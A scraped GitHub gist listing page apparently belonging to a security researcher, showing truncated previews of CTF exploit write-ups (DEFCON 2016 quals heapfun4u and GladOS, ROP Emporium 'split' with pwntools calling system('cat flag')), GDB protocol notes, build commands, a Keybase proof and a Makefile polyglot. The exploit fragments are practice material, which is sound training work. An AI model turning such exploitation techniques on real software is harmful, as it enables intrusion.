Skip to content

Instantly share code, notes, and snippets.

zachriggle /
Last active Jan 4, 2016
import scapy, struct, socket, binascii, logging
from scapy.all import *
from collections import defaultdict
# Entry
def USBIP(PacketData):
if PacketData[:2] == '\x01\x11':
zachriggle /
Last active May 25, 2016
DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit

DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit Write-Up

The write-up is the exploit.

Example Output

[*] './heapfun4u'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO

DEFCON Quals 2016 Pwnable -- GladOS

The write-up is basically the exploit.

from pwn import *
# Here's the disassembly for everything
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100

Keybase proof

I hereby claim:

  • I am zachriggle on github.
  • I am zachriggle ( on keybase.
  • I have a public key ASBYNpGGwzmRUnRb5-fg2Qy7jdirdXG-ECeIbGP_Lv72oQo

To claim this, I am signing this object:

zachriggle /
Last active Oct 25, 2017
I fucking hate you, GDB

Lots of commands in GDB's protocol use hex-encoded data. A $ starts a packet, and all packets end with # followed by a one-byte, hex-encoded checksum.

Let's look at the protocol for the request:

remote get /proc/self/cmdline ./cmdline

Which should fetch /proc/self/cmdline and dump it to ./cmdline. It does!

$ phd cmdline
zachriggle /
Created Sep 25, 2017
Exploit for ROP Emporium's "split"
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('split')
# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
system = elf.symbols.system
cat_flag ="cat flag").next()
apt-get install python2.7-dev python2.7
apt-get build-dep gdb
apt-get source gdb
sed -i -E "s|python3|/usr/bin/python2.7|" debian/rules
dpkg-buildpackage -uc -us -j8
dpkg-install ../*.deb
RARVM reversible/patchme
Modified 'unrar' source to dump context and disassembly.
Wrote two separate solvers since the challenge was broken.
To build the disassembler/debugger:
- unzip -d unrar
- cd unrar
zachriggle / Makefile
Last active Feb 2, 2021
Makefile polyglot
View Makefile
#if 0
.PHONY: run
run: a.out
@gcc -xc $(MAKEFILE_LIST)
ifeq (0, 1)